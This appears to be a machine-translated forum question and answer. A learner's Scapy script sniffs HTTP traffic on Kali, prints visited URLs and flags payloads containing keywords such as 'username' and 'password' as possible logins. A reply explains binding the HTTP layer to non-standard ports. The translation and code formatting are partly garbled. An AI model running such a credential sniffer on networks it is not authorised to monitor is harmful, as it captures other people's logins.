**大家好,我正在网上学习有关网络数据包的知识。我在蟒蛇中偶然发现了"Scapy"。我应该有"Http"部分的数据包结果在终端可用。由于某些原因,我在某些网站上看不到"###[HTTP]###"。在我学习的视频中,导师使用了相同的代码,但他浏览的每个网站都会看到"http",但我无法复制他的结果。我的Kali中有python 2.7.18和python 3.9.9。在终端中调用程序时,我尝试同时使用"python"one_answers"python3"标头(在打包器中查找"http"层时没有变化(。
我正在捕获一些http数据包,但不是全部。我一直在我的Kali VM上开发python代码,该代码将查找URL和登录信息的数据包传输,并在终端中显示这些URL。教程的结果和我预期的差不多,但我没有得到同样的结果。在教程中,教练和我做了同样的事情(去必应,打开一个随机图像(
我是不是做错了什么。。。?请在这个问题上提供帮助,我将不胜感激。**
# CODE:
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) #prn = call back function, udp= audio and
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw): # When used, it will only show the packet with username and password.
load = packet[scapy.Raw].load
keywords = ["uname", "username", "user", "pass", "password", "login", "Email"]
for keyword in keywords:
if keyword in str(load):
return load
def process_sniffed_packet(packet):
#print(packet.show())
if packet.haslayer(http.HTTPRequest):
#print(packet.show())
URL = get_url(packet)
print("[+] HTTP >> " + str(URL))
login_info = get_login_info(packet)
if login_info:
print("nnPossible username and Password > " + str(login_info) + "nn")
sniff("eth0") # This is connected to the internet
终端结果:我浏览了Bing.com,打开了一张随机的图片。我已经使用打印(packet.show(((作为我浏览的最终图像。在教程中有一个###HTTP###层,但我没有那个层。随机图像的包装机信息图像
┌──(venv)─(root💀kali)-[~/PycharmProjects/hello]
└─# python packet_sniffer.py
[+] HTTP >> b'ocsp.digicert.com/'
[+] HTTP >> b'ocsp.pki.goog/gts1c3'
[+] HTTP >> b'ocsp.pki.goog/gts1c3'
[+] HTTP >> b'ocsp.pki.goog/gts1c3'
[+] HTTP >> b'ocsp.pki.goog/gts1c3'
[+] HTTP >> b'ocsp.pki.goog/gts1c3'
[+] HTTP >> b'ocsp.pki.goog/gts1c3'
[+] HTTP >> b'ocsp.digicert.com/'
^C
My Expectation: These are exactly the URLs That I visited for above result.
┌──(venv)─(root💀kali)-[~/PycharmProjects/hello]
└─# python packet_sniffer.py
[+] HTTP >> file:///usr/share/kali-defaults/web/homepage.html
[+] HTTP >> https://www.google.com/search?client=firefox-b-1-e&q=bing
[+] HTTP >> https://www.bing.com/
[+] HTTP >> https://www.bing.com/search?q=test&qs=HS&sc=8-0&cvid=75111DD366884A028FE0E0D9383A29CD&FORM=QBLH&sp=1
[+] HTTP >> https://www.bing.com/images/search?`view=detailV2&ccid=3QI4G5yZ&id=F8B496EB517D80EFD809FCD1EF576F85DDD3A8EE&thid=OIP.3QI4G5yZS31HKo6043_GlAHaEU&mediaurl=https%3a%2f%2fwww.hrt.org%2fwp-content%2fuploads%2f2018%2f01%2fGenetic-Testing-Test-DNA-for-Genetic-Mutations-Telomeres-Genes-and-Proteins-for-Risk-1.jpg&cdnurl=https%3a%2f%2fth.bing.com%2fth%2fid%2fR.dd02381b9c994b7d472a8eb4e37fc694%3frik%3d7qjT3YVvV%252b%252fR%252fA%26pid%3dImgRaw%26r%3d0&exph=3500&expw=6000&q=test&simid=608028087796855450&FORM=IRPRST&ck=326502E72BC539777664412003B5BAC2&selectedIndex=80&ajaxhist=0&ajaxserp=0`
^C
我遇到了类似的问题,结果是我试图分析的HTTP/1.0数据包没有通过PORT 80发送。相反,我的数据包是通过PORT 5000发送的。
默认情况下,scapy实现仅在数据包在PORT 80上发送时将其解释为http。
我在对GitHub问题的回应中发现了以下片段(根据Cukic0d对类似问题的回答,对于不应该安装而的包(。
scapy.packet.bind_layers(TCP, HTTP, dport=5000)
scapy.packet.bind_layers(TCP, HTTP, sport=5000)
在调用sniff()之前添加此片段解决了我的问题,并允许我继续操作。
希望这能有所帮助。